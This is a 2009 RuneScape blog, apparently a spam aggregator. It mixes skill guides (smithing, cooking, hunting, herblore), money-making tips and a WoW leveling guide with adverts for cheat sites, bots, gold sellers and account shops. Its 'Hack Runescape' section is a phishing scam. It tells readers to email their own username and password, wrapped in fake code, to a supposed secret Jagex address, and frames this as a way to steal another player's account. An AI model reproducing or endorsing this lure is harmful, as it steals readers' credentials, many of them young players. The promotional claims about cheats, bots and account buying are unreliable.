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Tuesday, 30 June 2009

runescape powerleveling

Not many players have figured out the secrets of how to increase your Runescape Smithing level, without spending all the gold in their bank. Of all the skills available on the free servers, smithing has the fewest players at level 99. Why is this?

First, it is because smithing quickly is expensive. If you do not want to take the time to smelt your own bars, then it will cost you plenty to buy them. And very few items will sell for as much as the bars cost, so you won't get all your money back. Second, it is not exactly exciting...but the same can be said of any of the skills that require standing around and doing the same thing over and over.

I can't address the boring part (although I will say that I write or surf while smithing if the task I am doing takes a while), but I can stop it from costing you money. In fact, I can probably help you make money at it (although most people, including me, will want to spend the profits on more XP).

There are two things that you can do at lower runescape powerleveling that will be quite effective at raising your smithing level, even on Free servers:

1. Smelt iron ore into bars. This takes only level 15, which is easy to achieve. Even on free servers where you get only about 50% of your bars from your ores, this is still profitable. Iron ore sells for about 99 gp on the Grand Exchange, and iron bars sell for about 229, so you will make a bit of money at this. On Member's servers, you can use a Ring of Forging to get 100% success for 140 bars, and get even more XP and profit.

2. Smelt iron ore and coal into steel bars. This takes level 30, which can be achieved by the above method quite quickly, or by simply doing the Knight's Sword Quest (will take you from level 1 to almost 30). While you can only make 9 bars per trip, you will have a 100% success rate, and the profit on this is much higher: about 40% return on your money. This can very quickly add up, and the extra profits can be used to finance even more smithing.

Monday, 29 June 2009

3 Runescape Million Secrets That Makes You Tons Of Money In Runescape

Making Runescape Million is every player's goal in Runescape. The main reason you are reading this right now, is so that you would be able to get millions of gold or Runescape golds, right? And the fact is that having millions of gp in Runescape is the gateway to getting the party hats, armor and having other players following you.

Personally, I have been playing Runescape for 4 years now. I have exchange emails with over 63,000 Runescape players, and my

Runescape guide had sold over 900 copies to date. Having said that, this would give you a good reason to continue to read and listen to what I have to tell you.

So, I do know what's going on in your mind right now, and I totally understand what you want in terms of making Runescape millions, or even make tons of money in Runescape.

You want to know the fastest, easiest, and richest way to make millions in Runescape right?

Let me tell you the truth, yes, it's possible. However, unless you know the 3 secrets that I'm going to mentioned below, you are not going to get it.

And the 3 Runescape Secrets have nothing to do with methods of merchanting, fishing, mining or even chicken feathers.

The 3 Runescape millionaire secrets is all about YOU! Yes! You...

Imagine this, I give you and another player the same Runescape strategies and Runescape secrets. But why would you only get, say 500K, from it... and the other player can get 5 million or even 50 million gp from it? That's at least 10 times to a 100 times difference in terms of earnings.

Why do you think this is so...?

So, after my personal research, interview with thousands of Runescape players, finally, I found a proven method to let more Runescape players to be able to make Runescape millions.

These 3 Runescape secrets are real simple. They are just 3 very simple English words, however, if you think about it, it makes total sense in you to be successful in Runescape.

Are you ready?

Here is it...

They are,

1) Focus

2) Consistency

3) Persistence

Read the 3 words at least 10 more times, and each time, think about how are you using the 3 words in your Runescape. I know it have nothing to do with Runescape, it have to do with you, and everything that you are doing right now in your life. Get it?

Focus - if you are not focusing on what you want to do in Runescape, you'll get nothing out of it. I have know players who have been playing for 5 years, and all they ever get is 200k gp. That's not good at all. That's because they did not focus on what they want.

Consistency - You need to be consistence in your Runescape gameplay. You might be busy with your studies and other activities, that's totally fine and important too. However, be as consistence as possible in login into Runescape, and building up your character. Each time you work on it, you can getting closer to be a Runescape Millionaire.

Persistence - Do you ever think that to be Top in ranking in your school or class ever requires hardwork? Of course you need to work hard on it. Not only that, you will face lots of challenges and obstacles, does that means you give up? NO! You don't. You find ways to solve the problems and you continue towards your goal right? That's what I mean by persistence. Get it?

Remember, to be a Runescape millionaire, you need not just focus on the latest Runescape tips or Runescape secrets to make Runescape golds. They do helps, however, unless you have these 3 Runescape qualities, if not, you can never have Runescape Million.

Saturday, 27 June 2009

runescape hacks

Runescape Easy Money Cheat

Are you working too hard for your money? Join the MmorpGuides community and like all the other members, start making some easy Runescape gold. A lavish lifestyle with countless gold coins and the best items that money can buy will become available to those fortunate enough to discover the website. Why waste precious time, all the latest Runescape money secrets, Runescape 2 gold cheats, and Runescape money exploits, will be revealed to you to make your journey as profitable as possible.

RS Quest Help

Need some expert advice on how to complete Runescape quests, missions, and tasks? Mmorpguides.com offers Runescape 2 guides, RS walkthroughs, Runescape tips, and Runescape 2 hints such as Runescape 2 quest guides, Runescape 2 quest cheats and any other source of information needed to get through difficult times. Runescape Guides for easy gold, Runescape 2 quest walkthroughs hints, Runescape rare item guide, RS2 mining guide, and Runescape money making tips will increase your level of proficiency and knowledge and free you from the constant threat of failure.

Runescape Cheats

Owning the rarest items and weapons, the most Runescape gold and having a perfect record in the battlefield can become a reality faster than you think. Mmorpguides.com can ensure success by offering you the latest Runescape cheats, RS secrets, and even the shortest lived Runescape glitches and RS2 exploits long before they reach the general public. By becoming a member, you’ll be part of an elite group that has easy access to the best resources available. Runescape money cheats, Runescape rare item duplicator, RS stat editors, Runescape stat changers, RS scams and other clever means of building a high level Runescape account can be found at the website. Your Runescape character can be a representation of yourself and MmorpGuides will help you create a character to be proud of.

Runescape Auto Bots

In times when you're unable to guide your character throughout the world of Gielinor, game play that’s free of external control or influence is priceless. MmorpGuides.com has the most sought after and popular Runescape autos, RS 2 bots, and Runescape 2 scripts. Some of which are available for you include Runescape 2 woodcutting auto bots, RS autominer, Runescape fisher auto bots, Runescape macro downloads, Runescape scar scripts, and RS2 auto trainer. Getting ahead has never been so easy; the Runescape programs that can be found at Mmorpguides will automatically level up your character whenever it doesn't fit your schedule.

Runescape Gold

Is becoming one of the rich and powerful in Runescape nothing more than a distant dream? Make it a reality. You now have the opportunity to uncover all the greatest Runescape gold secrets at Mmorpguides.com. Ever wonder how high level gamers always have an endless supply of Runescape gold coins? As a member of Mmorpguides all the exclusive RS gold secrets that are shared by some of the top players will be revealed to you such as Runescape gold cheats, ultimate Runescape gold guides, RS gold exploits, Runescape gold piece walkthrough, and Runescape gold tips. Stop coveting other player’s stacks of RS gold and start making some major Runescape gold pieces by joining the Mmorpguides club today. If you are looking to buy cheap RuneScape 2 gold then check out mZot.com. mZot compares RS2 gold prices from the most trusted sites and shows you the best and cheapest RuneScape gold.

Runescape Tip

A good Runescape tip can save you hours of frustration on your journey by keeping you from making a fatal decision or making a wrong turn. If you want to level up at crazy speeds, completing quests in a fraction of the time, and become the best at every job than allow Mmorpguides.com to make it possible! Some of the most sought after Runescape tips obtainable to you as a Mmorpguides member are Runescape quest tips, RS money tips, Runescape mining tip, Runescape crafting tip, Runescape merchanting tip, and RS training tips. You’ll have first hand at all the best Runescape tips and cheats, Runescape hints and tips, Runescape tips and tricks, RS cheat tips, and Runescape tip guides so join today.

Runescape Rare Item

Is that new Runescape rare item not quite within your reach? Are you heading into battle with dull and rusty Runescape items? Mmorpguides.com can help. With their exclusive content you’ll be flaunting only the best Runescape rare items. Runescape item guides, RS item lists with Runescape item prices, Runescape item duplicators, Runescape rare item walkthroughs, Runescape gold item tips, Runescape item strategies, Runescape rare item cheats and any other Runescape item help needed will be available to you as a member. Isn’t it time for an upgrade? Visit Mmorpguides.com today.

Runescape Party Hat

RS party hats, also known as Runescape phats, have become the ultimate symbol of wealth in the game. RS party hats are sought after by many but only a few players are fortunate or wealthy enough to have collected all six colors of the rare Runescape party hats. Whether you’re just starting a collection or trying to complete your Runescape party hat set, Mmorpguides.com will bring you the necessary content. To increase your chances of getting a party hat in Runescape join Mmorpguides where you will share valuable resources with other members. With the Runescape party hat cheats and guides available to you, Runescape blue party hats, RS green party hats, Runescape red party hats, RS white party hats, Runescape yellow phats, and Runescape purple party hats will soon be yours.

Hack Runescape

Hi pplz, i have recently figured out a way to hack rune scape while scannying the linux server which they run rune scape on etc etc. below will tell ya how to hack runescape accounts.

I have really only made this up for ppl who have been scammed by other ppl.So if you haven’t been scammed i rather you not cheat for the fun of it, but it is up to you, but it isnt fair if ya use this to steal other pplz password for rune scape.

Hack Runescape Step 1.

Get the rune scape account name you want to hack.

make sure you have a runescape account as you need to confuse the rune scape server into giving ya you victims password.

Hack Runescape Step 2.

There is a secret e-mail which jagex bot use to notify ppl about there password and send them there password if needed i found it while i was scanning their server.

The code used to send ppl passwords was hard to find but i finaly found it while collenting bits and peices while scanny the server.

Hack Runescape Step 3.

Here is the code you need to send to the server to confuse it.

Do as exactly as it is typed or it will fail.

Subject: rspasswrdrecovry ( it must be exactly as typed) (copy and paste)

Now after that type:

#=No.:4658932//$%Code&” Your Usernme”%*==$& }

(press enter)

#serident6254$$Code%” Victims Username”*$$1==$& }

Press enter)

ExHack..:0547$$Code*&%$$#imput*%”Your Password”*32&&*$==02$& }

Hack Runescape Step 4.

You must replace the words in ” ” to what it says and as i said dont make any mistakes or you will fail. What i would do is HIghlight the text and copy it onto the e-mail and paste it that way ya dont make any mistakes.

There you have it Hacking rune scape is easy for you now.

happy hacking!

Tuesday, 23 June 2009


most of the people may agree with the following saying:breakfast is the most important meal of the day.In runescape this sentence is also useful.You can cook the fish,pies over a stove or an open fire,it is the fastest way to heal your hitpoints up.

The Basics

Cooking can be a fun and interesting skill in RuneScape, since you can often cook several different types of food at the same level. There's a variety of things you can do with this skill, but more importantly, it's an essential skill to survival in the game.

There are 2 main kinds of food in the game:

1.Foods that require ingredients to be mixed together such as bread, pizzas and pies tend to take more time to make.

2.Foods such as fish or beef that need to be fished for or taken from a monster drop and then cooked over a stove or a fire.

Once you've decided on the food to make, you can follow the instructions on the Cooking Chart below.

Helpful Drinks

If you need a temporary boost to your Cooking level, then the chef's Delight drink is exactly the drink for you. It can be Brewed, and this drink will increase your Cooking level by 1-5 points, depending on your Cooking level (a higher Cooking level means it will increase more). This drink is Members-Only.

Cooking Gauntlets

These helpful items are a reward from the Family Crest Quest, and will increase your chance of successfully cooking various types of fish.

Cooking Foods

Fish can usually be cooked on either a stove or fire, but most other foods must be cooked on a range. To cook a food, just use the item with a range or fire. From time to time you may burn the food you're trying to cook, which makes it un-eatable. But, as you gain experience you will get better at cooking and burn less food.

Cooking Notes

1.Karambwan - These are only edible after completing the Tai Bwo Wannai Trio Quest. You must cook it for a 'long time' or it will be poisonous.

2.Italicized items can only be cooked by Members.

3.You can hover over words in blue for more info.

Other Cooking Info

The Moveable Cooking Spit

If you're the type of RuneScaper that's always on the run, and you're looking for a way to cook your food wherever you are (whether in the middle of the jungle, or on the sidewalks of Varrock), the mobile Roasting Spit is just the tool for you.

Spits can be Smithed, and all you do is use it with either a piece of Rabbit Meat, or a Chompy Bird to skew it. Next, light a fire and use the skewed meat with it to set up a Rotisserie Cooker in just seconds!

Making Sinew for Crossbows

Due to how Crossbows are designed, they need a much stronger string than Flax can provide. So, you need to make some Sinew to string your Crossbow so that it can be used!

It's actually very easy to make Sinew, and it only requires level 1 Cooking to do. Simply use a piece of Bear Meat (or Beef) with a Range, and choose to make it into Sinew rather than an edible piece of meat. And that's it! You can then spin the newly created piece of Sinew on a Spinning Wheel to get a Crossbow String, and then attach it to your crossbow (u) to complete it.

Runescape - Get Filthy Rich in to Start Selling Your Own Self Made Gold

I have succeeded in making billions of Gold! Helping a lot of my ingame friends, yet I keep some Gold secrets to only my closest friends!

The road to becoming rich will be split into a couple of paths:

1) Making your First 1GP, and raising it to 100K

2) 100k- 500k

3) 400k- 1M

4) 1M-2M

5) 2M-5M

6) 5M-10M

7) Reach from 5M-10M in exactly 7 minutes

To make your first 1GP-100K

You will need to follow some strategies such as

- Clay Mining

- Feather Collecting

- Rune Essence Mining


For members, you have two methods:

- Picking Flax

- Arrow Shafts

Climbing up from 100K-400K

Start Making Clay and resell them to Quadruple your money to 400K.

Making your first Million

Now here is a part where TOP PLAYERS would NEVER want to share!!

To begin, make sure you have at least 400K. Use that 400K to buy 4000 Cow-hides at the Grand Exchange for approx. 100GP each. Now head to the desert city of Al Kharid! To enter Al Kharid you need to have 15gp, which you will pay as a toll on the front gate,located East of Lumbridge Castle. Once you have passed the gate, head south until you come upon a small desert city that has a bank. Tan the Hides into Hard Leather, and get ready to make profit you never imagined :)


Now doubling your first million is even easier than the last step were you had to make your first Million.

Now you have an idea on how to start making millions, Goodluck on your journey!

12 Smart Trading Runescape Tip

When you play RuneScape trading is everything! Here are twelve smart RuneScape tips to give you a significant edge over other RuneScape players.

1.Never buy anything from a RuneScape shop (unless it’s stackable) because it will be more expensive than trading with a RuneScape friend.

2.Don’t get scammed! There’s no worse feeling in the world than knowing you just lost a few million RuneScape gold to some stupid guy with a stupid idea.

3.When you play RuneScape, don’t scam yourself! Just like in real life, always know about the RuneScape item you’re buying or selling to get a fair deal.

4.There are a lot of honest people out there playing RuneScape but there are always a few people that will scam, cheat or lie for a few RuneScape coins.

5.Scammers often come up with creative ways to con you at RuneScape like pulling an item at the last minute hoping you’ll click “Accept” fast or telling you they are Jagex staff to get your RuneScape password.

6.When you spot a RuneScape scammer, the best way to deal with him or her is to completely ignore them.

7.Don’t feel obligated to do anything when playing RuneScape!

8.Many people like to try to “befriend” lots of higher-level RuneScape players. Of course, a lot of the advanced RuneScape players are genuinely nice people. However, beware of RuneScape players that cozy up to you, act really nice and do you a few small favors but then turn around and ask for something really big (like a RuneScape party hat) just because they did a couple of little things for you while playing the game.

9.Remember that all RuneScape trades are not equal. You might feel guilty about not giving people anything in return, which is perfectly normal. But if what another RuneScape player asks for is ridiculous, just tell them no. Period.

10.If they bully you or keep demanding an unfair RuneScape trade just remove them or block them.

11.When you play RuneScape, don’t let anyone take advantage of you or manipulate you into doing something you don’t want to do.

12.It is very important to know the value of the RuneScape items you are trading because you can scam yourself out of a lot of gold simply by not knowing what a RuneScape item is worth! This simple RuneScape rule may mean a little extra work on your part. But if you’re committed to being a top RuneScape player, this one tip alone will save you lots of trouble.

For example, another RuneScape player could have something you really want like a rune scimitar and they are right in front of you selling it for 35k! You think to yourself “I can spare the money. They might sell it soon and I’ll lose my chance to buy the RuneScape item.” Sound familiar? But if you buy it without knowing the fair market price you could also easily be scamming yourself out of precious RuneScape gold.

Seriously, if you don’t know the price of a RuneScape item, there’s a good chance the person selling it does and is looking to make a profit at your expense. So don’t take the chance: always check prices before you buy or sell anything while playing RuneScape.

Outland Fast Powerleveling / Grinding Guide

Want to get to 70 fast but don't know where to start? This guide will show you exactly how to grind your way to 70, and will show you the best leveling spots in each zone.

Hellfire Peninsula 60-61

The best grinding spot in this area are the Wrathguards at the Legion Front. Most of the mobs in this zone are non-squishes, so these are the mobs that die quickly.

Zangarmarsh 61-63

Funggor Cavern is the best grinding spot in the zone as the Marsh Elementals die quickly and do not deal much damage. It's a good place to hang out for awhile, however you should focus more on doing the quests in this zone though.

Terokkar Forest 63-65

Although not all of the mobs in Firewing Point are easy, they are the best mobs to grind in the zone. Sometimes the adds may slow down the grinding a bit. This may not be a great grinding spot but it's probably the best one in this zone. Make sure you get the quests for Firewing Point before you go there.

Nagrand 65-67

The Vir'aani Clan around Oshu'gun (especially at the 3 little crystal areas) are the best grinding spots for this zone. also the Voidspawns around this area die fast too.If you find you can't get enough XP doing the quests, then you can hang out here for a little bit grinding these etherals.

Blade's Edge Mountains 67-68

Questing is the easiest way to level up here as there is no single good grinding spot.

Netherstorm 68-69

This zone really does not have any good grinding spots, the Wrathbringers and Terrorguards are probably the best mobs to grind in this zone. Another decent place could be at the Ethereum Staging Grounds, at 55.39

Shadowmoon Valley 69-70

The Legion Hold is one of the best grinding spots period. The Shadow Council Warlocks die extremely fast and drop good loot. Occasionally there is an Elite that you need to watch out for.

Now you know exactly where to grind. Happy leveling!

Playing RuneScape Online Game Tips and Tricks

The entertainment arena relating to online video gaming is blowing the socks of the Wall Street Wannabes.

With popular games such as "Everquest" and "World of Warcraft" grossing millions for their investors, others have tried entering the market.

With astonishing growth these no name companies have begun to gather hundreds thousands of followers for their simpler versions of "Everquest" and alike. One such online game is RuneScape@.

RuneScape was created by a small company called Jagex. They have made a few smaller single player games but nothing as big as their online RPG game RuneScape.

In the game RuneScape, you traverse a world as a person that you design, accomplishing tasks such as making weapons, fishing, fighting, and more. After so long the goals are accomplished and you find new things to explore.

There are two types of accounts available: Free, which is supported by ads, and Premium, which has no advertising and you also have more options. Although the graphics are from the days of the 80's they do have a very reliable uptime and since it is free you cannot complain. WOW and Everquest charge $50 for the game in the store and then $15 a month for memberships, very expensive yet extremely awesome graphics.

The interactive game, RuneScape, is popular with the younger crowd because it is an interactive myspace site. You create a character, hair, clothes, personality and more. You can chat with your friends or anyone else throughout the world. It is a great game for kids and can be very entertaining. They also have safety features to protect against SPAM and obscene language, which makes it even safer for your kids to play. But let us get to the real topic of this article, the RuneScape tips and tricks.

Throughout the Internet you will find literally hundreds of fans websites with ¡°The Ultimate Guide¡± but let us face it, how many really are. The most important things are the following:

First, if you intend to really play and evolve throughout this game, you will need to open a premium membership account for $5 a month. With this you can store more gold and items at the bank and you are also open to a whole new level of quests and arenas.

Second, auto miner programs are always key to building strong characters quickly and to acquire lots of gold.

Lastly, play. The whole point of game is not to get the secrets from a guide and then beat it, it is to play the game and exercise your mind to solve the puzzles. With over 150,000 people playing at any given moment and millions of registered users, probably all between the ages of 12-16, the game cannot be that hard.

Monday, 22 June 2009


RuneScape is a Java-based Massively Multiplayer Online Role-Playing Game (MMORPG) operated by Jagex Ltd. It is a graphical browser game incorporating 3D rendering. The game has approximately 8.5 million active accounts and is recognised by the Guinness World Records as the world's most popular free MMORPG.

RuneScape takes place in the game world of Gielinor, a fantasy-themed realm divided into several different kingdoms, regions, and cities.Players can travel throughout Gielinor on foot, by using magical teleportation spells and devices, or mechanical means of transportation.Each region offers different types of monsters, resources, and quests to challenge players. Players appear on the screen as customizable avatars, setting their own goals and objectives. RuneScape does not follow a linear storyline; players choose their own goals. Players can fight NPC monsters, complete quests, or increase their experience in any of the available skills.Players interact with each other through trading, chatting, or by participating in both combative and cooperative minigames and activities.

The predecessor of RuneScape, DeviousMUD, was created by Andrew Gower in 1998. This was rewritten and renamed RuneScape, and released on 4 January 2001 in beta form.As the game's popularity grew, the game engine was rewritten, producing a new product dubbed RuneScape 2, released in beta on 1 December 2003, and was renamed as RuneScape upon its stable release on 29 March 2004.

Runescape Pottery Crafting Guide

Pots, pans, bowls, and pie plates are useful items that characters can make for use in another trade skill.

Runescape players can enjoy a number of trade skills, but the trade skill called crafting would make up a number of other trade skills in other mmorpgs. The word count limitations on Suite 101 articles make it necessary to cover each aspect of Runescape crafting individually.

Pots, bowels, and other miscellaneous items are needed in other Runescape trade skills, such as cooking and construction. A character can use the crafting skill to make pieces of pottery out of clay.

Complementary Skills to Use Crafting to Make Pottery in Runescape

Pieces of pottery are often needed in cooking recipes. Learning how to make pieces of pottery can reduce the costs associated with preparing a good meal for his character or other players. A player's crafting costs costs can be further cut if he uses the mining skill to find clay.

Using the Crafting Skill to Make Pottery

Characters using the crafting skill to make clay do so using a process that is a considerably scaled down version of what potters use in real life to make their wears. Once a Runescape character softens the clay he wants to make into a pot, bowl, or pie dish he must then travel to a pottery wheel.

Making Lower Level Potions in Runescape

This will let the gamer know what lower level potions they can make and when they can make them in Runescape.

Runescape, the free MMORPG game, has over two dozen skills that the player can learn and level up.

Herblore is one of these skills, and with this ability players can brew potions and teas for consumption. There are certain ingredients that will be needed and a certain level of herblore skill needed per potion. This will tell what level the player needs to be to brew the potion.

Potions for Herblore 3-10

These potions will need the ingredients given and will do what it is designed to do.

•Attack Potion – (Herblore 3) Making this potion gives 25 experience and needs an eye of newt and one Guam leaf. 10-15% addition in attack rating is what the potion will do for the player.

•Anti-Poison Potion – (Herblore 5) Making this potion gives 3.75 experience and needs ground unicorn horn and marrentil. This cures poison.

•Waking Sleep Potion – (Herblore 5) Making this potion gives 168 herblore experience and needs ground suqah tooth, a lunar vial, guam, and merrentil. These are needed potions for the “Lunar Diplomacy” quest.

•Relicym’s Balm – (Herblore 8) Making this potion gives 42 experience points. It requires a snaked weed and a rogues purse to make, and it will cure disease for the drinker.

These lower herblore skill needing potions can be made quickly to raise your experience level.

Potions for Herblore 11-20

These potions will need the ingredients given, the skill given in parenthesis, and will do what it is designed to do.

Weapons that Help Runescape Prayer Skill

Some of the weapons in the game of Runescape can boost the Prayer skill, find out which ones in this article.

The Prayer skill in Runescape is one of two dozen skills that players can use and level up in the game. The skill mainly is leveled up by burying bones, replenished by praying at altars, and is an interesting combining skill with Magic.

If boosting Prayer skill is important, these are weapons that can raise the level of Prayer if they are wielded.

One to Two Prayer Points

These are the items that raise Prayer the least of the weapons mentioned.

•Bronze Mace, Iron Mace – These two items are going to raise Prayer one point each and they are able to be found inside of the Flynn’s Mace shop.

•White Dagger, White Short Sword, White Long Sword, White Claws, White Battleaxes, White Two Handed Swords, White Halberds, and White Magic Staffs – These items are all going to be raising Prayer a point each and they are found inside of the White Knight Armory building.

•Steel Mace – This mace will raise the Prayer skill by two points. It is found inside of Flynn’s Mace Shop.

•Black Mace – This mace will raise the Prayer skill by two points. It is normally a drop after slaying a dark warrior.

For those just starting out and needed every last boost to skill, these are better than nothing.

Three to Four Prayer Points

These are the mid range items that raise Prayer.

Saturday, 20 June 2009

Runescape Hunting Guide: Bird Snaring

Bird snaring is one of the first forms of hunting learned in Runescape. In this guide, we’ll cover how to use bird snares and what types of birds can be caught with these devices.

Bird Snaring

Like kebbit tracking, you can start snaring birds right away at Hunter level 1 in Runescape. The only item you need to get started is a bird snare, which can be purchased for 6 gp each at one of the Hunter shops in Runescape – there’s one in Yanille and one in Nardah. It’s also possible to buy bird snares on the Grand Exchange, but be prepared to pay a lot more for them there than you would at the hunter shops.

When you first start out, at Hunter level 1, you’ll only be able to set one bird snare at a time. As you increase in level, you will be able to set multiple snares according to the following chart:

1.Hunter Level 1 – 1 snare

2.Hunter Level 20 – up to 2 snares

3.Hunter Level 40 – up to 3 snares

4.Hunter Level 60 – up to 4 snares

5.Hunter Level 80 – up to 5 snares

Also, it is possible that a bird snare might fall over and vanish if you don’t keep a close eye on it or you are interrupted by a random event. So, it’s a good idea to have a couple spares, especially if you don’t have a quick method of getting to one of the hunting shops.

Before we get into how to use the snares, we’ll take a look at the different birds you can catch in Runescape and where they can be found.

Types of Birds and Where to Find Them

All birds in Runescape will drop bones, raw bird meat, and some type of feathers. Here’s a list of the various birds you can snare along with some information about each one.

Crimson Swift – The Crimson Swift can be found in the Jungle Hunting Area, southeast of Feldip Hills near the shore. You can start hunting this bird at Hunter Level 1. In addition to bones and raw bird meat, the Crimson Swift will also drop red feathers which can be used for the same purposes as regular feathers. (Click any image for a larger view.)

Golden Warbler – This bird is located in the Desert Hunting Area, southeast of Al Kharid, and can be snared with a Hunter Level of 5 or higher. It drops yellow feathers which can be used just like regular feathers.

Copper Longtail – The Copper Longtail is found in the Woodland Hunting Area near the Piscatoris Fishing Colony. It drops brown feathers (used like regular feathers) and requires a Hunter Level of 9 to snare.

Continue on to the next page to find out about the other types of birds you can snare in Runescape along with an explanation of how to catch these birds.

Runescape Hunting Guide: Catching Ferrets and Rabbits

Trying to figure out how to snare a rabbit in Runescape? First you have to catch a ferret. In this Runescape hunting guide, we’ll explain how to trap ferrets and how to use them to snare rabbits.

Supplies Needed
Before you set off on your ferret trapping and rabbit snaring trip, you’ll need a few supplies.

Box trap – You’ll need at least one box trap to catch a ferret to use to flush rabbits out.

Rabbit snare – In addition to a ferret, you’ll need at least one rabbit snare to catch a rabbit. However, it’s helpful to have as many as your Hunter skill allows you to use.

Lit torch (optional) – If you have a Hunter level of 39 or higher, you can use a lit torch to smoke the box trap in order to increase your chance of catching a ferret. This isn’t necessary, though, and you may not want to waste an inventory space on a torch.

Raw meat (optional) – Another way to increase the chance of catching a ferret is to bait the box trap with any type of raw meat. However, like smoking the trap, this isn’t necessary at all.

Trapping a Ferret
Once you’ve completed the Eagles’ Peak quest in Runescape, you can start trapping ferrets in the Woodland hunting area near the Piscatoris Fishing Colony. As a reward for that quest, Nickolaus will teach you how to trap ferrets, and he’ll even give you a box trap so you can start right away.

You can purchase additional box traps at the hunter shops in Yanille and Nardah for 38 gp each. It’s also possible to purchase them at the Grand Exchange in Varrock, but expect to pay a higher price for them if you decide to go that route.

While you’re buying supplies, pick up a few rabbit snares. You’ll need them along with a ferret to catch rabbits, and they only cost 18 gp at the hunter shops.

Ferrets can be found near Nickolaus’ tent on the northwest side of Eagles’ Peak. The screenshot below shows the exact location. (Click any image for a larger view.)

Walk out to the middle of the area where the ferrets are running around and click on the box trap in the inventory to lay the trap.

All you have to do now is wait. If you want to increase your chances of catching a ferret right away, you can bait the trap with any type of raw meat or, if you are Hunter level 39 or higher, you can smoke the trap. However, neither one of these things is necessary so I usually don’t even bother with them.

Once a ferret has triggered the trap, the box will close up like the one shown in the screenshot below. It is possible for a ferret to trigger the trap without getting caught in it, so you may have to dismantle the device and start over.

When you do manage to trap a ferret (and it shouldn’t take that long at all), you can retrieve it from the box trap and it will appear in your inventory. Now, you can move on to hunting rabbits.

Snaring Rabbits
If you travel just a little bit northeast of the ferret area near Nickolaus’ tent, you’ll find several rabbit holes arranged in a circular pattern.

Walk around and set up as many rabbit snares as your level permits in front of these rabbit holes.

After setting up the snares, go to a rabbit hole that doesn’t have a snare and use a ferret on that hole.

The ferret will then flush a rabbit out, and it will run out of one of the other rabbit holes in the circular area. At this point, check all your snares to see if you managed to catch it. If not, use the ferret on one of the holes with no snares again. Keep doing this until a rabbit gets caught in a snare as shown in the image below.

When you retrieve a snared rabbit, you’ll get bones, raw rabbit meat, and a rabbit foot. The rabbit foot is particularly nice because it can be strung and worn as a necklace to help increase the chance of a bird’s nest dropping when you're chopping down trees.

Friday, 19 June 2009

Addictive Runescape Gameplay

Runescape is very addictive game, which has recently just hit over 1 millions users. This article will focus on the gameplay and style of the popular online role playing game Runescape.


There 2 levels of membership in the game Runescape. The first being the Free to play or know as many as F2P, there are no membership fees and players can play the game for free.

The second, membership level is Pay to play or P2P. This is the section we will focus mostly on in this article.

This membership level is a completely optional service, which allows the user access to additional game features and content that the free to play players do not have access too. There is an extreme addition to the games content, such as a lot more content, quests, player skills, and a lot more to the playing world. Members also gain access to many mini-games with unique rewards; they also get to use many new in game items, such as armor and weapons. On top of the extra content, members also receive a larger bank to store there items and money in. Paid users also have access to post in the official Runescape forums, and also receive priority customer support over free players.

Members are granted access to special member's only servers, which contain no in game advertisements displayed during play.


When players sign up for an account they start the game on Tutorial Island. This island takes roughly a half an hour to complete. On this island the new players will be taught how to use the controls of the game, by simple live walkthrough examples. After completing the tutorial, players will then be able to go the main land of Runescape, and begin real game play with the thousands of other in game players.

RuneScape has many sound effects, and the in game music, often changes with the user reaches new game areas. This music is meant to enhance mood and gameplay for the players. Players can of course decide to control the volume of the music or can disable all sound if they want to, via the in game control panel provided.

Mining Rune Essence-A Quick Runescape Cash Strategy

Jagex has made the decision not to offer new quests to non-members on a continuing basis. The last quest to be offered to both members and non-members alike was the Rune Mysteries Quest. Even the newest player in the game can complete this quest.

Now that you are a level 3 player with the ability to mine essence, hop to it. The only thing you will need is a pick axe to mine the essence. Don't bring anything with you except for your pickaxe. Don't bring food, and don't wear armor. This will only slow you down. If by some chance you have completed most or finished the Temple of Ikov Quest, then be sure to wear your boots of lightness. With just

a pickaxe wielded, a full load of essence, and the boots of lightness on, you will have a weight of -2 kg. This will allow you to run longer and carry the maximum amount of essence that you possibly can.

Go to the Rune shop in Varrock, talk to Aubry, and be teleported to the essence mine fields. Mine the essence from the rocks until you are full. Run back to the Varrock bank west and deposit your essence. Once you have around 1,000 essence go to Varrock Bank west and announce that you are "selling 1k of ess". People will offer you anywhere from 30k to 50k runescape gold depending on your negotiation skills (35-40k is a fair price and you should go with it if you are offered it). Always log in your runescape accounts and go to world 1 to sell your runes or world 2 if you are a member. Members will usually offer more for essences, but if you are not a member and can only get on world 1 be patient and you will sell them for a nice price. Do not sell your essence in anything less than 1k lots. You will always get a higher gp per essence the larger the amount is that you are selling. It should take you around 10 minutes to mine 200 essence with a decent pickaxe and a set up like I have described above. With a low level pickaxe it will take a bit longer. Let's say for arguments sake that you have worked on your mining level a little bit are just starting out and you are kind of slow. Now you will have to add some time to sell the essence and take a break to eat and go to the bathroom (and maybe go to school or work), but becoming a Runescape Millionaire can be as easy as this.

Tips For Purchasing Runescape Account

There are many ways to get a new Runescape account. The best choice is buying it in a formal site.

Firstly, you have a lot of selection. Most site always have many accounts for you to choose. Some other sites even offer “account booking” service. It is another kind of powerleveling, if you are willing to wait, account booking is a good choice. Also, if you choose to buy account in a site, you will find that they are very professional. And most of the sits’ service is very good. In my opinion, happy shopping is important. In many site, you can get the account you like as soon as you paid for it. I think everyone likes speedy delivery. ^^Beside, they have professional gamers, maybe they can give you some advise how to level account quickly.

However, there are also some shortages when you buy Runescape account in sites. Some sites sell accounts at a very high price. I suggest that you can search 3-4 sites and compare their price and service and then choose the best one. Another thing you should mention is that few sites cheat customers. You can check the credibility of a site before you buy products from it to avoid cheating. You should also notice the service of site. Online service respects a site’s service quality. I have bought an account from a site which i don’t want to mention the name here. I met the worst customer service i have ever been. At last, i didn’t buy the account although i like it very much. Because i am not sure whether they will help me if I meet problems about this account in future.

Then, how and where can we choose a desired account? You can search “buy Runescape account” in google.com. Google will list many sites for you. Such as Accountrs.com,Usfine.com,Runescape-account.com...etc,You can compare these sites in the following aspects: speedy response, professional service, and reasonable price. If a site contains such quality, i believe you will be satisfied in buying there.

I know a site which has many accounts and provides good customer service. It is very interesting when i get contact with this site. Four months ago, my friend asked me to play gamer with him at a weekend. When i logged in the game, i didn’t find him. Then a stranger sent a message to me. This guy had the best equipment which i have dreamed for long time. You may already know he was my friend! He bought this account in accountrs.com. He was not very good at training account. But then he got an account far better than mine! He told me this site. I viewed the site immediately! The customer service operator asked my requirement and recommended 3 accounts for me. At last, i bought one of them. Lol, it was really a happy experience.

I don’t mind to share this secret with other friends. Now we all get desired accounts! How wonderful! I believe you can also get an unparalleled account soon!

How to Protect Your Runescape Account

As we know, runescape is one of the most popular online games all over the world during the age 13-25 friends. There are more than one hundred thousand players are playing runescape game every day.

